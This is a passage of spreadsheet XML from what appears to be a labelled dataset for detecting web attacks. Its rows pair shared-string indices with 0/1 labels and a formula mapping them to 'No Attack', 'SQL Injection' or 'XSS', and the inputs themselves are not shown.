      </c>
      <c r="C32521" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32522" s="1" t="s">
        <v>34501</v>
      </c>
      <c r="B32522">
        <v>0</v>
      </c>
      <c r="C32522" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32523" s="1" t="s">
        <v>30938</v>
      </c>
      <c r="B32523">
        <v>0</v>
      </c>
      <c r="C32523" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32524" s="1" t="s">
        <v>31663</v>
      </c>
      <c r="B32524">
        <v>0</v>
      </c>
      <c r="C32524" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32525" s="1" t="s">
        <v>23394</v>
      </c>
      <c r="B32525">
        <v>0</v>
      </c>
      <c r="C32525" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32526" s="1" t="s">
        <v>20510</v>
      </c>
      <c r="B32526">
        <v>0</v>
      </c>
      <c r="C32526" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32527" s="1" t="s">
        <v>34350</v>
      </c>
      <c r="B32527">
        <v>0</v>
      </c>
      <c r="C32527" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32528" s="1" t="s">
        <v>36491</v>
      </c>
      <c r="B32528">
        <v>0</v>
      </c>
      <c r="C32528" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32529" s="1" t="s">
        <v>22931</v>
      </c>
      <c r="B32529">
        <v>0</v>
      </c>
      <c r="C32529" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32530" s="1" t="s">
        <v>21672</v>
      </c>
      <c r="B32530">
        <v>0</v>
      </c>
      <c r="C32530" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32531" s="1" t="s">
        <v>21090</v>
      </c>
      <c r="B32531">
        <v>0</v>
      </c>
      <c r="C32531" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32532" s="1" t="s">
        <v>34216</v>
      </c>
      <c r="B32532">
        <v>0</v>
      </c>
      <c r="C32532" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32533" s="1" t="s">
        <v>34149</v>
      </c>
      <c r="B32533">
        <v>0</v>
      </c>
      <c r="C32533" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32534" s="1" t="s">
        <v>34168</v>
      </c>
      <c r="B32534">
        <v>0</v>
      </c>
      <c r="C32534" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32535" s="1" t="s">
        <v>30919</v>
      </c>
      <c r="B32535">
        <v>0</v>
      </c>
      <c r="C32535" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32536" s="1" t="s">
        <v>37516</v>
      </c>
      <c r="B32536">
        <v>0</v>
      </c>
      <c r="C32536" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32537" s="1" t="s">
        <v>28851</v>
      </c>
      <c r="B32537">
        <v>0</v>
      </c>
      <c r="C32537" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32538" s="1" t="s">
        <v>23877</v>
      </c>
      <c r="B32538">
        <v>0</v>
      </c>
      <c r="C32538" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32539" s="1" t="s">
        <v>6904</v>
      </c>
      <c r="B32539">
        <v>1</v>
      </c>
      <c r="C32539" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32540" s="1" t="s">
        <v>17124</v>
      </c>
      <c r="B32540">
        <v>1</v>
      </c>
      <c r="C32540" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32541" s="1" t="s">
        <v>6905</v>
      </c>
      <c r="B32541">
        <v>1</v>
      </c>
      <c r="C32541" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32542" s="1" t="s">
        <v>25097</v>
      </c>
      <c r="B32542">
        <v>1</v>
      </c>
      <c r="C32542" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32543" s="1" t="s">
        <v>14396</v>
      </c>
      <c r="B32543">
        <v>1</v>
      </c>
      <c r="C32543" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32544" s="1" t="s">
        <v>18272</v>
      </c>
      <c r="B32544">
        <v>1</v>
      </c>
      <c r="C32544" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32545" s="1" t="s">
        <v>25428</v>
      </c>
      <c r="B32545">
        <v>1</v>
      </c>
      <c r="C32545" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32546" s="1" t="s">
        <v>6906</v>
      </c>
      <c r="B32546">
        <v>1</v>
      </c>
      <c r="C32546" s="7" t="str">
        <f t="shared" si="508"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="32547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32547" s="1" t="s">
        <v>36654</v>
      </c>
      <c r="B32547">
        <v>0</v>
      </c>
      <c r="C32547" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32548" s="1" t="s">
        <v>35106</v>
      </c>
      <c r="B32548">
        <v>0</v>
      </c>
      <c r="C32548" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32549" s="1" t="s">
        <v>29928</v>
      </c>
      <c r="B32549">
        <v>0</v>
      </c>
      <c r="C32549" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32550" s="1" t="s">
        <v>28442</v>
      </c>
      <c r="B32550">
        <v>0</v>
      </c>
      <c r="C32550" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32551" s="1" t="s">
        <v>22176</v>
      </c>
      <c r="B32551">
        <v>0</v>
      </c>
      <c r="C32551" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32552" s="1" t="s">
        <v>33170</v>
      </c>
      <c r="B32552">
        <v>0</v>
      </c>
      <c r="C32552" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32553" s="1" t="s">
        <v>20320</v>
      </c>
      <c r="B32553">
        <v>0</v>
      </c>
      <c r="C32553" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32554" s="1" t="s">
        <v>33388</v>
      </c>
      <c r="B32554">
        <v>0</v>
      </c>
      <c r="C32554" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32555" s="1" t="s">
        <v>31934</v>
      </c>
      <c r="B32555">
        <v>0</v>
      </c>
      <c r="C32555" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32556" s="1" t="s">
        <v>34495</v>
      </c>
      <c r="B32556">
        <v>0</v>
      </c>
      <c r="C32556" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32557" s="1" t="s">
        <v>30801</v>
      </c>
      <c r="B32557">
        <v>0</v>
      </c>
      <c r="C32557" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32558" s="1" t="s">
        <v>27276</v>
      </c>
      <c r="B32558">
        <v>0</v>
      </c>
      <c r="C32558" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32559" s="1" t="s">
        <v>26848</v>
      </c>
      <c r="B32559">
        <v>0</v>
      </c>
      <c r="C32559" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32560" s="1" t="s">
        <v>22416</v>
      </c>
      <c r="B32560">
        <v>0</v>
      </c>
      <c r="C32560" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32561" s="1" t="s">
        <v>28444</v>
      </c>
      <c r="B32561">
        <v>0</v>
      </c>
      <c r="C32561" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32562" s="1" t="s">
        <v>20069</v>
      </c>
      <c r="B32562">
        <v>0</v>
      </c>
      <c r="C32562" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32563" s="1" t="s">
        <v>23924</v>
      </c>
      <c r="B32563">
        <v>0</v>
      </c>
      <c r="C32563" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32564" s="1" t="s">
        <v>29050</v>
      </c>
      <c r="B32564">
        <v>0</v>
      </c>
      <c r="C32564" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32565" s="1" t="s">
        <v>32928</v>
      </c>
      <c r="B32565">
        <v>0</v>
      </c>
      <c r="C32565" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32566" s="1" t="s">
        <v>26830</v>
      </c>
      <c r="B32566">
        <v>0</v>
      </c>
      <c r="C32566" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32567" s="1" t="s">
        <v>23233</v>
      </c>
      <c r="B32567">
        <v>0</v>
      </c>
      <c r="C32567" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32568" s="1" t="s">
        <v>32629</v>
      </c>
      <c r="B32568">
        <v>0</v>
      </c>
      <c r="C32568" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32569" s="1" t="s">
        <v>30862</v>
      </c>
      <c r="B32569">
        <v>0</v>
      </c>
      <c r="C32569" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32570" s="1" t="s">
        <v>28063</v>
      </c>
      <c r="B32570">
        <v>0</v>
      </c>
      <c r="C32570" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32571" s="1" t="s">
        <v>22745</v>
      </c>
      <c r="B32571">
        <v>0</v>
      </c>
      <c r="C32571" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32572" s="1" t="s">
        <v>20555</v>
      </c>
      <c r="B32572">
        <v>0</v>
      </c>
      <c r="C32572" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32573" s="1" t="s">
        <v>32848</v>
      </c>
      <c r="B32573">
        <v>0</v>
      </c>
      <c r="C32573" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32574" s="1" t="s">
        <v>33426</v>
      </c>
      <c r="B32574">
        <v>0</v>
      </c>
      <c r="C32574" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32575" s="1" t="s">
        <v>36109</v>
      </c>
      <c r="B32575">
        <v>0</v>
      </c>
      <c r="C32575" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32576" s="1" t="s">
        <v>34275</v>
      </c>
      <c r="B32576">
        <v>0</v>
      </c>
      <c r="C32576" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32577" s="1" t="s">
        <v>29113</v>
      </c>
      <c r="B32577">
        <v>0</v>
      </c>
      <c r="C32577" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32578" s="1" t="s">
        <v>24186</v>
      </c>
      <c r="B32578">
        <v>0</v>
      </c>
      <c r="C32578" s="7" t="str">
        <f t="shared" si="508"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32579" s="1" t="s">
        <v>28520</v>
      </c>
      <c r="B32579">
        <v>0</v>
      </c>
      <c r="C32579" s="7" t="str">
        <f t="shared" ref="C32579:C32642" si="509">IF(B32579=0,"No Attack", IF(B32579=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32580" s="1" t="s">
        <v>34631</v>
      </c>
      <c r="B32580">
        <v>0</v>
      </c>
      <c r="C32580" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32581" s="1" t="s">
        <v>37271</v>
      </c>
      <c r="B32581">
        <v>0</v>
      </c>
      <c r="C32581" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32582" s="1" t="s">
        <v>28293</v>
      </c>
      <c r="B32582">
        <v>0</v>
      </c>
      <c r="C32582" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32583" s="1" t="s">
        <v>22702</v>
      </c>
      <c r="B32583">
        <v>0</v>
      </c>
      <c r="C32583" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32584" s="1" t="s">
        <v>28023</v>
      </c>
      <c r="B32584">
        <v>0</v>
      </c>
      <c r="C32584" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32585" s="1" t="s">
        <v>29592</v>
      </c>
      <c r="B32585">
        <v>0</v>
      </c>
      <c r="C32585" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32586" s="1" t="s">
        <v>27388</v>
      </c>
      <c r="B32586">
        <v>0</v>
      </c>
      <c r="C32586" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32587" s="1" t="s">
        <v>22881</v>
      </c>
      <c r="B32587">
        <v>0</v>
      </c>
      <c r="C32587" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32588" s="1" t="s">
        <v>20929</v>
      </c>
      <c r="B32588">
        <v>0</v>
      </c>
      <c r="C32588" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32589" s="1" t="s">
        <v>27864</v>
      </c>
      <c r="B32589">
        <v>0</v>
      </c>
      <c r="C32589" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32590" s="1" t="s">
        <v>27591</v>
      </c>
      <c r="B32590">
        <v>0</v>
      </c>
      <c r="C32590" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32591" s="1" t="s">
        <v>35413</v>
      </c>
      <c r="B32591">
        <v>0</v>
      </c>
      <c r="C32591" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32592" s="1" t="s">
        <v>27190</v>
      </c>
      <c r="B32592">
        <v>0</v>
      </c>
      <c r="C32592" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32593" s="1" t="s">
        <v>30617</v>
      </c>
      <c r="B32593">
        <v>0</v>
      </c>
      <c r="C32593" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32594" s="1" t="s">
        <v>34482</v>
      </c>
      <c r="B32594">
        <v>0</v>
      </c>
      <c r="C32594" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32595" s="1" t="s">
        <v>34254</v>
      </c>
      <c r="B32595">
        <v>0</v>
      </c>
      <c r="C32595" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32596" s="1" t="s">
        <v>30899</v>
      </c>
      <c r="B32596">
        <v>0</v>
      </c>
      <c r="C32596" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32597" s="1" t="s">
        <v>22751</v>
      </c>
      <c r="B32597">
        <v>0</v>
      </c>
      <c r="C32597" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32598" s="1" t="s">
        <v>21448</v>
      </c>
      <c r="B32598">
        <v>0</v>
      </c>
      <c r="C32598" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32599" s="1" t="s">
        <v>22826</v>
      </c>
      <c r="B32599">
        <v>0</v>
      </c>
      <c r="C32599" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32600" s="1" t="s">
        <v>34908</v>
      </c>
      <c r="B32600">
        <v>0</v>
      </c>
      <c r="C32600" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32601" s="1" t="s">
        <v>29213</v>
      </c>
      <c r="B32601">
        <v>0</v>
      </c>
      <c r="C32601" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32602" s="1" t="s">
        <v>31567</v>
      </c>
      <c r="B32602">
        <v>0</v>
      </c>
      <c r="C32602" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32603" s="1" t="s">
        <v>21238</v>
      </c>
      <c r="B32603">
        <v>0</v>
      </c>
      <c r="C32603" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32604" s="1" t="s">
        <v>34484</v>
      </c>
      <c r="B32604">
        <v>0</v>
      </c>
      <c r="C32604" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32605" s="1" t="s">
        <v>36745</v>
      </c>
      <c r="B32605">
        <v>0</v>
      </c>
      <c r="C32605" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32606" s="1" t="s">
        <v>20258</v>
      </c>
      <c r="B32606">
        <v>0</v>
      </c>
      <c r="C32606" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32607" s="1" t="s">
        <v>27904</v>
      </c>
      <c r="B32607">
        <v>0</v>
      </c>
      <c r="C32607" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32608" s="1" t="s">
        <v>21474</v>
      </c>
      <c r="B32608">
        <v>0</v>
      </c>
      <c r="C32608" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32609" s="1" t="s">
        <v>28315</v>
      </c>
      <c r="B32609">
        <v>0</v>
      </c>
      <c r="C32609" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32610" s="1" t="s">
        <v>29980</v>
      </c>
      <c r="B32610">
        <v>0</v>
      </c>
      <c r="C32610" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32611" s="1" t="s">
        <v>22223</v>
      </c>
      <c r="B32611">
        <v>0</v>
      </c>
      <c r="C32611" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32612" s="1" t="s">
        <v>32891</v>
      </c>
      <c r="B32612">
        <v>0</v>
      </c>
      <c r="C32612" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32613" s="1" t="s">
        <v>31150</v>
      </c>
      <c r="B32613">
        <v>0</v>
      </c>
      <c r="C32613" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32614" s="1" t="s">
        <v>31840</v>
      </c>
      <c r="B32614">
        <v>0</v>
      </c>
      <c r="C32614" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32615" s="1" t="s">
        <v>28801</v>
      </c>
      <c r="B32615">
        <v>0</v>
      </c>
      <c r="C32615" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32616" s="1" t="s">
        <v>32372</v>
      </c>
      <c r="B32616">
        <v>0</v>
      </c>
      <c r="C32616" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32617" s="1" t="s">
        <v>35791</v>
      </c>
      <c r="B32617">
        <v>0</v>
      </c>
      <c r="C32617" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32618" s="1" t="s">
        <v>28385</v>
      </c>
      <c r="B32618">
        <v>0</v>
      </c>
      <c r="C32618" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32619" s="1" t="s">
        <v>22470</v>
      </c>
      <c r="B32619">
        <v>0</v>
      </c>
      <c r="C32619" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32620" s="1" t="s">
        <v>30072</v>
      </c>
      <c r="B32620">
        <v>0</v>
      </c>
      <c r="C32620" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32621" s="1" t="s">
        <v>23102</v>
      </c>
      <c r="B32621">
        <v>0</v>
      </c>
      <c r="C32621" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32622" s="1" t="s">
        <v>28076</v>
      </c>
      <c r="B32622">
        <v>0</v>
      </c>
      <c r="C32622" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32623" s="1" t="s">
        <v>34055</v>
      </c>
      <c r="B32623">
        <v>0</v>
      </c>
      <c r="C32623" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32624" s="1" t="s">
        <v>37487</v>
      </c>
      <c r="B32624">
        <v>0</v>
      </c>
      <c r="C32624" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32625" s="1" t="s">
        <v>33504</v>
      </c>
      <c r="B32625">
        <v>0</v>
      </c>
      <c r="C32625" s="7" t="str">
        <f t="shared" si="509"/>
        <v>No Attack</v>
      </c>
    </row>
